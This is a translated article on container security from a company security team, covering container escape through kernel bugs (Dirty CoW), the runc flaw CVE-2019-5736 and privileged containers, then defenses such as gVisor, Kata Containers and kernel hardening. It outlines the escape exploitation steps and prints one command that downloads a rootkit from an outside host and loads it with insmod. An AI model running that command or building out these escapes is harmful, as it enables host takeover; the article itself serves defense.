Container Security practice of Cloud Native

2025-01-17 Update From: SLTechnology News&Howtos


Shulou (Shulou.com), 06/02 report

As more and more enterprises move to the cloud and containerize, cloud security has become a top priority of enterprise protection.

Today's article comes from Meituan's information security team. Starting from a representative cloud native technology and taking container escape as the entry point, it moves from the attacker's perspective (container escape) to the defender's (mitigating container escape) and lays out some of Meituan's exploration and practice in container security.

Overview

Cloud Native is a technical system and methodology made up of two words: Cloud and Native. Cloud means the application lives in the cloud rather than in a traditional data center; Native means the application is designed for the cloud from day one, runs best on the cloud, and takes full advantage of the cloud platform's elasticity and distributed nature.

Representative cloud native technologies include containers, service meshes (Service Mesh), microservices (Microservice), immutable infrastructure, and declarative APIs. For more on cloud native, please refer to CNCF/Foundation.

The author abstracts "cloud native security" into the technical sand table shown above. From the bottom up, the foundation runs from hardware security (trusted environments) to host security. Container orchestration technology (Kubernetes, etc.) can be regarded as the "operating system" on the cloud, responsible for the automated deployment, scaling, and management of applications; above it sit microservices, Service Mesh, container technology (Docker, etc.), and container images (registries). These pieces complement one another, and cloud native security is built on top of them.

Container security itself can be abstracted further into build-time security (Build), deployment-time security (Deployment), and runtime security (Runtime).

Within Meituan, image security is guaranteed by a container image analysis platform, which supervises container images through a rule engine. The default rules check the Dockerfile, suspicious files, sensitive permissions, sensitive ports, basic and business software vulnerabilities, and CIS and NIST best practices in the image, and provide risk trend analysis. This also covers part of build-time security.
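As an illustration only (not Meituan's actual platform), such a rule engine can be sketched as a set of checks over Dockerfile lines; the rules and the sensitive-port list below are hypothetical examples:

```python
# Toy sketch of a Dockerfile rule engine; the rules and the
# SENSITIVE_PORTS list are illustrative, not any real platform's rules.
SENSITIVE_PORTS = {22, 2375, 2376}  # sshd, plaintext/TLS Docker API

def check_dockerfile(text):
    """Return a list of (line_no, message) findings for one Dockerfile."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        upper = line.upper()
        if upper.startswith("EXPOSE"):
            for token in line.split()[1:]:
                port = token.split("/")[0]  # handle forms like "22/tcp"
                if port.isdigit() and int(port) in SENSITIVE_PORTS:
                    findings.append((n, f"sensitive port {port} exposed"))
        elif upper.startswith("USER") and line.split()[-1] == "root":
            findings.append((n, "image explicitly runs as root"))
    return findings
```

A real engine would add many more rule types (package CVE lookups, secret scanning, CIS checks), but the shape is the same: rules map image content to findings.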

Under a cloud native architecture, containers are deployed by container orchestration technology (such as Kubernetes), so deployment security overlaps with the container orchestration security mentioned above.

Runtime security is covered by HIDS (see "Ensuring IDC Security: Distributed HIDS Cluster Architecture Design"). The scope of this article also belongs to runtime security; it mainly addresses the modeled risk of container escape (in this article, "container" refers to Docker unless otherwise specified).

For security implementation guidelines, we divide them into three phases:

Before the attack: cut down the attack surface and reduce what is exposed (scenario keyword in this article: isolation)

During the attack: reduce the attack's success rate (scenario keyword in this article: hardening)

After the attack: reduce the value of the information and data an attacker can obtain after a successful attack, and raise the difficulty of leaving a backdoor.

In recent years, data center infrastructure has gradually shifted from traditional virtualization (e.g., the KVM+QEMU architecture) to containerization (the Kubernetes+Docker architecture), but "escape" remains the most serious security problem enterprises face under both architectures, and the most representative security issue among container risks. The author takes container escape as the starting point and moves from the attacker's perspective (container escape) to the defender's (mitigating container escape) to explain container security practice and thereby alleviate container risk.

Container risk

Containers provide a standard way to package application code, configuration, and dependencies into a single object. Containers are built on two key technologies: Linux Namespace and Linux Cgroups.

Namespaces create a near-isolated user space and provide the application with its own view of system resources (file system, network stack, processes, and user IDs). Cgroups enforce limits on hardware resources such as CPU, memory, devices, and network.
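As a small illustration, a process's namespace membership is visible from user space under /proc/&lt;pid&gt;/ns; the helper names below are illustrative:

```python
import os
import re

def parse_ns_link(target):
    """Parse a /proc/<pid>/ns symlink target such as 'mnt:[4026531840]'
    into a (namespace_type, inode) tuple."""
    m = re.match(r"^(\w+):\[(\d+)\]$", target)
    if m is None:
        raise ValueError(f"unexpected namespace link: {target!r}")
    return m.group(1), int(m.group(2))

def list_namespaces(pid="self"):
    """Return {ns_type: inode} for a process; two processes are in the
    same namespace exactly when the inode numbers match."""
    ns_dir = f"/proc/{pid}/ns"
    result = {}
    for entry in os.listdir(ns_dir):
        ns_type, inode = parse_ns_link(os.readlink(os.path.join(ns_dir, entry)))
        result[ns_type] = inode
    return result
```

Comparing `list_namespaces(1)` (PID 1 on the host) with `list_namespaces()` from inside a container shows differing mnt/pid/net inodes, which is exactly the isolation a container escape has to break.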

Containers differ from VMs: a VM emulates a hardware system, and each VM runs an OS in a separate environment. The hypervisor emulates CPU, memory, storage, and network resources, which can be shared many times over by multiple VMs.

A container has seven attack surfaces in total: Linux Kernel, Namespace/Cgroups/Aufs, Seccomp-BPF, Libs, Language VM, User Code, and the container (Docker) engine.

Taking container escape as the risk model, the author refines these into three attack surfaces:

Linux kernel vulnerabilities

The container itself

Insecure deployment (configuration).

1. Linux kernel vulnerabilities

A container shares its kernel with the host, relying on the two technologies Namespace and Cgroups to isolate the container's resources from the host, so a vulnerability in the Linux kernel can lead to container escape.

Kernel privilege escalation vs. container escape

General methodology of Linux kernel exploitation

Information collection: gather everything helpful for writing the exploit. For example, the kernel version (which kernel is being attacked?), which hardening configurations are enabled in that version, and which kernel functions the shellcode will need to call. For the latter, you query the kernel symbol table to obtain function addresses; you can also obtain address information, structure layouts, and other data useful for exploitation from the kernel.
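As a small example of this information-collection step, kernel symbol addresses can be read from /proc/kallsyms (subject to kptr_restrict); a parser sketch with illustrative function names:

```python
def parse_kallsyms_line(line):
    """Parse one /proc/kallsyms line, e.g.
    'ffffffff81000000 T _stext' or
    'ffffffffc0001000 t helper [some_module]'."""
    parts = line.split()
    addr = int(parts[0], 16)
    sym_type = parts[1]        # T/t = text, D/d = data, etc.
    name = parts[2]
    module = parts[3].strip("[]") if len(parts) > 3 else None
    return addr, sym_type, name, module

def find_symbol(name, path="/proc/kallsyms"):
    """Return the address of a kernel symbol, or None if absent.
    Addresses that read as 0 mean kptr_restrict is hiding them."""
    with open(path) as f:
        for line in f:
            addr, _, sym, _ = parse_kallsyms_line(line)
            if sym == name:
                return addr
    return None
```

Defenders use the same interface: comparing the exported symbol list against expectations is a classic rootkit-detection trick.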

Trigger phase: trigger the vulnerability, control RIP, and hijack the kernel code path; in short, acquire the ability to execute arbitrary code in the kernel.

Shellcode layout: when writing a kernel exploit, we need to find a piece of memory to hold the shellcode. This memory must satisfy at least two conditions:

First: when a vulnerability is triggered, if we want to hijack the code path, we must ensure that the code path can reach the memory where the shellcode is stored.

Second: this piece of memory can be executed, in other words, the memory in which the shellcode is stored has executable permissions.

Execution phase

First: gain privileges higher than the current user by executing the shellcode; we usually go straight for root, which is, after all, the highest privilege level in Linux.

Second: preserve kernel stability. The privilege escalation must not corrupt the original kernel code paths, structures, or data and crash the kernel; root gained at the cost of a crash is of little use.

In short: collect information helpful for writing the exploit, then trigger the vulnerability and execute privileged code to achieve privilege escalation.

Container escape differs only slightly from kernel privilege escalation: you additionally need to break out of the namespace limits, by assigning a highly privileged namespace to the exploit process's task_struct. The detailed technicalities are outside the scope of this article; the author plans a separate technical article on container escape covering them.

Classic Dirty CoW

The author uses the Dirty CoW vulnerability to illustrate container escape caused by a Linux kernel vulnerability. The bug is old, but it is a classic. Writing this, the author cannot help asking: over the years, what fraction of the existing machines at major companies at home and abroad have actually been patched against Dirty CoW?

A race condition was found in the way the Linux kernel's memory subsystem handles copy-on-write (CoW) for private read-only memory mappings. An unprivileged local user can exploit it to gain write access to otherwise read-only memory mappings and thereby escalate privileges on the system; this is known as the Dirty CoW vulnerability.

The escape based on Dirty CoW does not follow the general approach described above; instead it uses the vDSO-overwrite technique.

vDSO (Virtual Dynamic Shared Object) is a mechanism the kernel provides to reduce frequent switching between kernel and user space and improve the efficiency of system calls: frequently used calls such as gettimeofday() can be served without a context switch. It is mapped both in kernel space and into the virtual memory of every process, including processes running with root privileges. The vDSO is mapped R-X (read and execute) in user space but RW (read and write) in kernel space, which makes it possible to modify it from kernel space and then execute it from user space. And because the container shares the host's kernel, this technique can be used directly for container escape.

The steps of utilization are as follows:

Get the vDSO address; with a recent glibc it can be obtained directly by calling the getauxval() function.

Find the address of the clock_gettime() function from the vDSO base and check whether it can be hijacked.

Create a listening socket

Trigger the vulnerability. Dirty CoW stems from a flaw in the kernel memory-management implementation of CoW: through a race, at the right moment, a read-only mapping of a file can be written despite CoW. The child process keeps checking whether the write has succeeded. The parent process creates two threads: the ptrace thread writes shellcode into the vDSO, while the madvise thread frees the vDSO mapping space, interfering with the ptrace thread's CoW handling and producing the race; when the race is won, the write succeeds.

Execute the shellcode, wait for a root shell to be returned from the host, and restore the original vDSO data on success.
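The first step above, locating the vDSO, can also be done without glibc by parsing /proc/self/auxv directly; a sketch (the AT_SYSINFO_EHDR constant is per the Linux auxv ABI, function names are illustrative):

```python
import struct

AT_NULL = 0
AT_SYSINFO_EHDR = 33   # auxv tag for the base address of the vDSO mapping

def parse_auxv(data, word_size=8):
    """Parse the binary auxv blob: (type, value) machine-word pairs
    terminated by an AT_NULL entry."""
    fmt = "<QQ" if word_size == 8 else "<LL"
    entries = {}
    for off in range(0, len(data) - 2 * word_size + 1, 2 * word_size):
        a_type, a_val = struct.unpack_from(fmt, data, off)
        if a_type == AT_NULL:
            break
        entries[a_type] = a_val
    return entries

def vdso_base():
    """Return the vDSO base address of the current process (Linux only)."""
    with open("/proc/self/auxv", "rb") as f:
        return parse_auxv(f.read()).get(AT_SYSINFO_EHDR)
```

The same address is what getauxval(AT_SYSINFO_EHDR) returns; an exploit then scans that page for the target function's ELF symbol.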

2. The container itself

Let's take a brief look at the architecture diagram of Docker:

Docker itself consists of the Docker Client (docker) and the Docker Daemon (dockerd). Since Docker 1.11, however, containers are no longer started by Docker Daemon alone; Docker integrates many components, including containerd, runc, and so on.

Docker Client is the client program of Docker; it sends user requests to Dockerd, and Dockerd in turn calls containerd's API. containerd is the intermediate component between Dockerd and runc, mainly responsible for container operations, image management, and so on. Upward, containerd provides a gRPC interface to Dockerd, shielding Dockerd from lower-level structural changes and keeping the original interface backward compatible; downward, it creates and runs containers through the combination of containerd-shim and runc. For more details, please refer to the runc, containerd, and architecture links at the end of the article. With this picture clear, we can combine our own security experience to look for escape-leading flaws in how these components communicate with and depend on each other.

Let's use the vulnerability caused by the runc component in Docker to illustrate the escape caused by the vulnerability of the container itself.

CVE-2019-5736: runc container breakout vulnerability

runc has a vulnerability in its handling of file descriptors that allows a privileged container to be exploited so that the container escapes and gains access to the host file system; an attacker can also exploit it through a malicious image or by modifying the configuration inside a running container.

Attack mode 1 (requires a privileged container): a running container is compromised and a system file is maliciously tampered with => the host runs docker exec, creating a new process in the container => the host's runc is replaced with a malicious program => the next time the host runs docker run/exec, the malicious program is executed.

Attack mode 2: docker run starts a maliciously modified image => the host's runc is replaced with the malicious program => the host runs docker run/exec and triggers the malicious program.

When runc executes a new program inside the container, an attacker can trick it into executing a malicious program by replacing the target binary inside the container with a custom binary that points back at the runc binary.

If the target binary is /bin/bash, it can be replaced with an executable script whose interpreter line is #!/proc/self/exe. When /bin/bash is then executed inside the container, /proc/self/exe runs instead, and that target points at the runc binary.

The attacker can then keep writing to the /proc/self/exe target and try to overwrite the runc binary on the host. To do so, open a file descriptor to /proc/self/exe with the O_PATH flag, then reopen it writable through /proc/self/fd/&lt;nr&gt; with the O_WRONLY flag and overwrite the binary in a loop.

3. Insecure deployment (configuration)

In practice we often run into this situation: different businesses ship their own configurations according to their own needs, but these configurations are not effectively controlled or audited, making the internal environment complex and varied and silently adding many risk points. The most common include:

Privileged container or run container with root permissions

Unreasonable Capability configuration (Capability with excessive permissions).

Given a privileged container, simply executing a command inside it can easily leave a backdoor on the host: $ wget https://kernfunny.org/backdoor/rootkit.ko && insmod rootkit.ko

At present, within Meituan, we have effectively reined in the problem of privileged containers.
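From the defender's side, over-privileged containers can be spotted by decoding the CapEff mask in /proc/&lt;pid&gt;/status. A sketch with a partial capability table (bit numbers are from linux/capability.h; the `looks_privileged` heuristic is the author's illustrative assumption, not a complete check):

```python
# Partial capability table (bit -> name), per linux/capability.h;
# only a few entries are listed here for illustration.
CAP_NAMES = {
    0: "CAP_CHOWN",
    2: "CAP_DAC_READ_SEARCH",
    7: "CAP_SETUID",
    12: "CAP_NET_ADMIN",
    16: "CAP_SYS_MODULE",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}

def decode_capeff(hex_mask):
    """Decode a CapEff value such as '0000003fffffffff' (as found in
    /proc/<pid>/status) into the set of capability bit numbers."""
    mask = int(hex_mask, 16)
    return {bit for bit in range(64) if mask & (1 << bit)}

def looks_privileged(hex_mask):
    """Heuristic: CAP_SYS_ADMIN plus CAP_SYS_MODULE together strongly
    suggest a privileged (or near-privileged) container."""
    bits = decode_capeff(hex_mask)
    return 21 in bits and 16 in bits
```

The default Docker capability set (CapEff 00000000a80425fb) lacks both CAP_SYS_ADMIN and CAP_SYS_MODULE, while --privileged grants the full mask.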

For this part, the industry has published best practices covering host configuration, Dockerd configuration, container images, Dockerfiles, the container runtime, and so on; for details, see Benchmark/Docker. Docker has also implemented these checks as an automated tool (Docker Bench for Security).

Security practice

To address the container escape problem described above, the rest of this article focuses on isolation (secure containers) and hardening (a hardened kernel).

Secure containers

The technical essence of secure containers is isolation. gVisor and Kata Containers are representative implementations, and academia is also exploring secure containers based on Intel SGX.

Put simply, gVisor inserts a layer between user space and kernel space and wraps it in an API, a bit like a user-mode kernel, to achieve isolation. Kata Containers isolates with lightweight virtual machines; it is similar to a traditional VM but integrates seamlessly with the current Kubernetes-plus-Docker architecture. Let's look at the similarities and differences between gVisor and Kata Containers.

Case 1: gVisor

gVisor is a user-mode kernel, or sandbox technology, written in Go, which implements most of the system call surface. It sits between the application and the kernel and provides isolation between them. gVisor is used in App Engine, Cloud Functions, and Cloud ML on the Google cloud platform. The gVisor runtime consists of multiple sandbox processes, each covering one or more containers. It intercepts all system calls from the application to the host kernel and handles them in user space with Sentry; acting as a guest kernel, gVisor can be thought of as a combination of a VMM and a guest kernel, or as an enhanced seccomp, without needing hardware virtualization support.

Figure 5 gVisor architecture diagram

Case 2: Kata Container

Kata Containers implements its container runtime on a hypervisor with hardware virtualization, just like a virtual machine. Each Kata Container Pod is therefore a lightweight virtual machine with its own complete Linux kernel. So Kata Containers provides the same strong isolation as a VM, while its optimization and performance-oriented design gives it agility comparable to containers.

Kata Containers has a kata-runtime on the host to start and configure new containers. For each container in a Kata VM, there is a corresponding Kata Shim on the host. The Kata Shim receives API requests from clients (such as Docker or kubectl) and forwards them over VSock to the agent inside the Kata VM. Kata Containers is further optimized to reduce VM startup time: with NEMU, a lightweight fork of QEMU, about 80 per cent of its devices and packages have been removed; VM templating creates clones of a running Kata VM instance and shares them with newly created Kata VMs, reducing startup time and guest memory consumption; and the hotplug feature lets a VM boot with minimal resources (CPU, memory, virtio block) and add more when requested later.

gVisor vs. Kata Containers

Between the two, the author leans toward gVisor, since its design is "lighter" than Kata Containers; yet gVisor's performance problem remains an insurmountable gap. Weighing the strengths and weaknesses of both, Kata Containers is the better fit for enterprises at present. Overall, secure container technology still needs exploration to meet the challenges posed by each enterprise's internal infrastructure.

Security kernel

As is well known, Android's open source nature means different vendors maintain their own Android versions. Because the Android kernel code comes from Linux kernel upstream, when a vulnerability appears upstream, security patches are pushed to Google, distributed from Google to the major vendors, and finally reach end users. Owing to the fragmentation of the Android ecosystem, this patch cycle is very long, so end users' security sits in a "window period" throughout the process. Refocusing on Linux, we find it has a similar problem.

The problems facing the kernel

Kernel patch

When a security vulnerability is disclosed, it is usually reported by the discoverer through communities such as Red Hat, openSUSE, or Debian, or submitted directly to the upstream maintainer of the relevant subsystem. Facing the many kernel versions and kernel customizations inside an enterprise, the upstream fix must be backported to each version, hot patches prepared, and customized kernels re-adapted, before production kernels are upgraded or hotfixed. Not only is the repair cycle long, but communication between people during the process also has its cost, further lengthening the window of exposure. During that window, we are essentially defenseless against the vulnerability.

Fragmentation of kernel version

Kernel version fragmentation is unavoidable in any company of a certain size. As technology develops rapidly and iterates continuously, the infrastructure's technology stack needs features from newer kernel versions, so kernel versions fragment over time. Fragmentation makes pushing security patches a great challenge: each patch must be specially adapted to the different kernel versions, then tested and verified, which drives maintenance costs very high. Most importantly, the heavy maintenance workload stretches the patch-testing timeline; in other words, the window of exposure to attackers grows longer, and the chance of being attacked rises greatly.

Customization of kernel version

Similarly, customized kernels arise from different companies' different infrastructures and requirements. With a customized kernel you cannot simply merge upstream patches; the patches have to be localized to fit the customization, which lengthens the danger window yet again.

The solution

We use security features to defend against and detect a class of vulnerabilities or a class of exploitation techniques. For example, SLAB_FREELIST_HARDENED detects double-free vulnerabilities in real time and defends against freelist pointer overwrites, with a performance loss of only 0.07% (see the upstream kernel source, commit id: 2482ddec).
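Whether such a hardening option is actually enabled on a given host can be checked from the kernel config; a minimal sketch (the file locations are the common defaults, and the function names are illustrative):

```python
import gzip
import os
import platform

def read_config_lines():
    """Return kernel-config lines from the usual locations, if present:
    /boot/config-$(uname -r) or /proc/config.gz."""
    rel = platform.release()
    for path in (f"/boot/config-{rel}", "/proc/config.gz"):
        if os.path.exists(path):
            opener = gzip.open if path.endswith(".gz") else open
            with opener(path, "rt") as f:
                return f.read().splitlines()
    return []

def option_state(lines, option):
    """Return 'y'/'m'/value for a set option, 'n' if explicitly unset
    (the '# CONFIG_FOO is not set' convention), or None if absent."""
    for line in lines:
        line = line.strip()
        if line.startswith(option + "="):
            return line.split("=", 1)[1]
        if line == f"# {option} is not set":
            return "n"
    return None
```

For example, `option_state(read_config_lines(), "CONFIG_SLAB_FREELIST_HARDENED")` reports whether the freelist hardening discussed above is compiled in.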

With the security features in place, vulnerabilities can be defended against without knowing their details, before they are reported and before a patch reaches production. Of course, security patches should still be applied. What we mainly solve here is the "window period" before a security patch finally lands in production, during which there would otherwise be no defense; at the same time, this provides some detection and defense capability against 0-days.

Implementation strategy

For security features already merged into the mainline Linux kernel: if the company's kernel supports the feature, enable its configuration, test kernel performance before and after enabling it, analyze the feature's principle and industry data, produce a real-world attack case (write an exploit to prove it), and feed the report back to the kernel team. The kernel team then evaluates it, and the decision to land it combines the opinions of both the security team and the kernel team. Features merged into mainline Linux but not into Red Hat can be ported from the mainline kernel, which guarantees code quality; the community has also done performance testing, and after the port is merged into the company's kernel it is tested again.

Features not yet merged into the mainline Linux kernel are ported from Grsecurity/PaX. Among its many security features, we evaluate and prefer those with few code changes and high benefit, that is, small kernel modifications that effectively address whole classes of vulnerabilities. For example, fully patching Dirty CoW across a fleet may take one to two years; with the right security feature added, the vulnerability can be defended against even before it is fixed.

Looking ahead

Finally, the author would like to share what an ideal state looks like in his eyes. Of course, we must "adapt to local conditions", making different choices and trade-offs at different stages according to the actual situation.

Treat the kernel team as a community: we submit code to them just as the Linux kernel community works with RFC (Request for Comments) and patch review, and the code is merged into the corporate kernel once there is no controversy.

First choose practical security features with small code footprints to port, implement, and land. Less code means fewer changes to the kernel, a lower chance of something going wrong, higher stability, and lower performance loss.

Completing a few security features per year is enough; one or two may suffice. Kernel hardening calls for caution and prudence. For example, company G abroad spends about six to seven months testing performance and stability in its data centers before a release.

After a security feature is hardened in, verify the defensive effect with a 0-day or N-day, and confirm that businesses running on this kernel remain stable with performance loss in an acceptable or controllable range. Each security feature requires a technical review. To ensure code quality, run a small-scale grayscale test on real high-throughput, high-concurrency, low-latency servers, and push it to the kernel team only once there is no dispute.

Finally, we can also submit the security-feature code directly to the Linux kernel community; if the code has deficiencies, we can work with the community to resolve them and get the code merged into the Linux mainline, thereby promoting adoption on our side as well.
